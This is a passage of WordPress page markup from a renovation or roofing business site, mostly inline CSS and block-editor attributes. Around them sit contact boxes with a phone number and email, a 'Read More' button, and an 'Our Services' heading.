.skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000 </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"0521c096-f2f6-411e-ad36-b722f208852d\"} -->\n<style type=\"text/css\"> .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0521c096-f2f6-411e-ad36-b722f208852d\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"b774f8a6-033a-4077-80ee-f0b2f30b0428\"} -->\n<style type=\"text/css\"> .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/about/\",\"target\":false,\"counterId\":\"9c9da01d-f799-4178-ae4b-9714df123864\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/about/\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30f90495-ee55-4579-800d-d587d050d2fa\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-30f90495-ee55-4579-800d-d587d050d2fa background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"e581b9d6-7409-4b90-bcaf-3c205e32317a\"} -->\n<style type=\"text/css\"> .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e581b9d6-7409-4b90-bcaf-3c205e32317a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb\"} -->\n<style type=\"text/css\"> .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"953dcb7c-b238-4718-b90a-88d1da2d4246\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-953dcb7c-b238-4718-b90a-88d1da2d4246\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">We Provide the Best Renovation</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column 